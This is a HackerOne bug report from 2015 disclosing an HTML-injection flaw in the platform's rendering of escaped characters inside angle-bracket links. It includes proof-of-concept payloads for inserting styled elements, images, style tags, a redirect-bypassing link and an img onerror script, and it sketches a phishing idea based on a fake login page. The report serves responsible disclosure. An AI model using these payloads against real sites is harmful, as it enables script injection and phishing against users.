HackerOne: Vulnerability with the way \ escaped characters in <http://danlec.com> style links are rendered

2015-02-01T23:52:18
ID H1:46072
Type hackerone
Reporter danlec
Modified 2015-02-03T17:34:45

Description

> <http://\<div\ style=\"font-size:24px;background:red;color:white;width:100%;height:48px;line-height:48px;text-align:center;\"\>Uh\ oh!</div\>>

Basic POC:

Sequences like &lt;http://\&lt;h1\&gt;test\&lt;/h1\&gt;&gt; are rendered as http://&lt;h1&gt;test&lt;/h1&gt;

Examples of what could be done with this:

Obviously there's a whole variety of stuff that can be done when you can inject arbitrary HTML, even in spite of the CSP protection.

We can put in elements we're not supposed to (see above, where we've inserted an attention grabbing div)

We can put in "arbitrary" images (i.e. profile pictures)

&lt;http://\&lt;img\ src=\"https://profile-photos.hackerone-user-content.com/production/000/000/013/76b3a9e70495c3b7340e33cdf5141660ae26489b_large.png?1383694562\"\&gt;

> <http://\<img\ src=\"https://profile-photos.hackerone-user-content.com/production/000/000/013/76b3a9e70495c3b7340e33cdf5141660ae26489b_large.png?1383694562\"\>>

We can put in our own &lt;style&gt; tags, e.g. using

&lt;http://\&lt;style\&gt;.markdownable\ blockquote{color:white;border:0;padding:0;margin:0;}a{color:red !important}\&lt;/style\&gt;&gt;

> <http://\<style\>.markdownable\ blockquote{color:white;border:0;padding:0;margin:0;}a{color:red\ !important}\</style\>>

Serious Exploits

We can bypass HackerOne's link /redirect:

&lt;http://\&lt;a\ href=\"http://danlec.com\"\&gt;Redirect\ bypassed\&lt;/a\&gt;&gt;

If we wanted to be particularly sneaky, we could use CSS to make a link cover the whole submission, so clicking anywhere would activate the link … which might allow us to do some phishing by having the link go to a fake HackerOne login screen.

> <http://\<a\ href=\"http://danlec.com\"\>Redirect\ bypassed\</a\>>

For browsers without good CSP support, like IE11, we can use this to run script on a victim when they try to view our submission using

&lt;http://\&lt;img\ style=\"display:none\"\ src=0\ onerror=\"alert(\'Uh\ oh\')\"\&gt;&gt;

> <http://\<img\ style=\"display:none\"\ src=0\ onerror=\"alert(\'Uh\ oh\')\"\>>

(If you're using IE11 for some reason, you'll get an alert when you view this submission)